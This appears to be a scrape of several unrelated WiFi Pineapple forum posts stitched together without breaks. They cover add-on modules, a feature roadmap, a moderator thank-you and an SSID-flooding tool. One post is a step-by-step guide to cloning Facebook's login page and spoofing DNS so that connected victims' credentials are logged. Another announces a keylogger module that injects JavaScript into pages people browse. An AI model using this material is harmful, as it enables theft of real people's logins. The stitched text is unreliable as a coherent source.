I'm currently working on a site survey add-on for our pineapple.

To be able to list APs, you have to switch down / up the wireless interface and to list clients you hate to switch down / up the monitor interface.
Can be done through the interface.

Module is available through module system.

Screenshot

I just got my pineapple a day ago, first thing I did right after testing its awesomeness was to replace the old dd-wrt linksys router from my WiFi Kit. Here's the result;

https://www.dropbox..../uwui_05.tar.gz

I present the first UWUI dual system version!!!! This version run in the PINEAPPLE and in Backtrack!!!!!

Install:

Pineapple Install:
- You need have a USB working in the pineapple.
- You need have installaled (nmap, tcpdump, sslstrip). You can install this modules in the pineapple or use opkg

1. In the computer decompress uwui_05.tar.gz
2. Copy to the Pineapple USB the uwui directory (you can put it were you want)
3. Make a link in the Pineapple /www directory (ln -s /usb/uwui /www/uwui)
4. Connect to the pineapple
5. In firefox go to http://172.16.42.1/uwui/index.php

Happy New Year!!!!

If you want make some donation to me, I very pleasure to use this money in Hackers for Charity.
You can use this link:
http://www.hackersforcharity.org/donate

Hey moderators,

No problems here. Trying out my shiny new pineapple and checking the forums for solutions and finding you guys promptly replying to multiple people not reading. I'm sure you're beating your collective heads against the wall, especially this time of the year, but I wanted to say thank you for helping us out and taking time away from your families. What you guys do is greatly appreciated by the community whether it is stated or not.

Hope you guys have a very merry Christmas!

-James

Hey everyone,

Something that has been asked again and again is "What is coming next"? You wanted a list of concrete planned things for the next, so here it is!

What of the below things do you want to see next? Have we left something out that you really want? Something crucial we forgot? Let us know here!
This does not include the below features/changes that are being made to cloud.wifipineapple.com. Those are almost complete and will go live very soon.

Pineapple Features:

• Reset ALL user data. Messed something up bad?
  This may be your way of saving your device.
• Modules
       -Multi-install modules
       -Keep modules after upgrade
       -Downloading: Progress indicator
       -Change color of out of date modules so that they can be located faster
• Keep some things (like modules) after an upgrade.
• Built in Macchanger
• Network manager UI (includes tethering etc. Will only support onboard devices - use modules for other things)
• LED controller
• Select what interface you want to launch Karma from
• Optional "Sticky" Navbar (will always be on top of screen even if you scroll).
• Integration of anonymous statistical information gathering.

Pineapple Bug Fixes:

• Fix module updates failing
• Fix changing password through UI if it has spaces / illegal characters.

Cloud Website:

• Re-vamped user experience.
• Make suggestions / bug reports.
• VOTE on what features you would like to see.

Please leave any comments and suggestions in this thread.

Ok, I'll give it a try, just to test my (non-existing) skill of writing guides


In my example I'm going to use Chrome as browser, Notepadd++ as editor, Winscp as filetransfer to the Pineapple and facebook as my target.
Otherwise all my pineapple configurations are standard, and I'm using USB storage and symlink to the www folder.

Copy, and edit your site


Transfer the edited Site


Symlink the .htm files to /www/


From this step there is a bit different ways to achieve different results. If you would like the url in your browser to look like the real deal, then follow my next guideline, otherwise I guess you would be fine with jumping to the DNS Spoof section. This would leave the /www/index.php in the original state.

Make the URL look real


Spoof DNS


Now, one thing to remember is that you will of course have to be connected to the pineapple for this to work, and that you might have to clear your cache before the DNS resolves to the pineapple.
If you are in Windows fire up commandline and enter ipconfig /flushdns and try to ping faceook.com. If everything is ok you should get reply from 172.16.42.1.
Test that it works by entering facebook.com in your browser an try to enter anything in username/pass. If everything works as expected you should be able to see what you entered in the Logs page if you have a fairly new flash, otherwise you can check the file /www/pineapple/logs/phish.log


And last but not least, All this is information that I have gathered around the forums, so none of this is my work. Credits goes to several users on the forums that have shared information!
That said, I'm hoping that if I have forgotten anything, or have misled anyone I'm hoping you could correct this for me, since I'm not the best writer out there.

Hey everyone,

 

As you all know, Digininja and WhistleMaster have been working hard to bring you their Keylogger infusion.

This infusion is now ready and you will find it in your local Pineapple bar.

 

Seeing as this is a rather complex module, there are bound to be issues with it.

Some of the issues we know about, some we don't. We ask you to report any issues you are having / any bugs you are experiencing. Please do this in an ordered fashion. Read through the entire thread and see if your issue has already been reported. If so and you have more to add, please quote the issue and add your findings to it. 

 

Please do not complain that something doesn't work. We are all working together to make this a great module, but please don't ask for ETAs.

 

Note that for the module to work you may need to run the 2.7.5 firmware. This is due to kernel dependencies of ebtables.

 

List of known issues upon release:

• If the browser sends a GET request that has the full url ie "GET http://blah.com/file HTTP/1.1" instead of "GET http://blah.com/file HTTP/1.1", some pages will fail to load (wikimedia for example - means no CSS for wikipedia).
• If an input field already has an onkeypress method attached to it, it will get overwritten - this will probably break the site's functionality. Can be fixed quite quickly but more on that later.
• The install_keylogger() javascript function doesn't always fire if the page takes too long to load. 
• Typing in input forms has a bit of a lag about it. Not much we can do about that.

 

We are looking forward to your feedback and hope you enjoy this module! We will keep enhancing it's performance and reliability and try to iron out any issues found.

Hi !
 
I wanted to share with the community my new module: Occupineapple (Sounds familiar, isn't it ) This is indeed based on Darren’s idea (Darren, if you pass through, I'm interested to have your feedback / thoughts )
 
Features:
- based on mdk3
- autostart

- Configuration (speed, channel)
- Choose SSID list to broadcast (if no list is specified, random SSIDs are broadcasted)
- SSID lists editor

- List can be with (*.mlist extension) or without MAC addresses (*.list extension)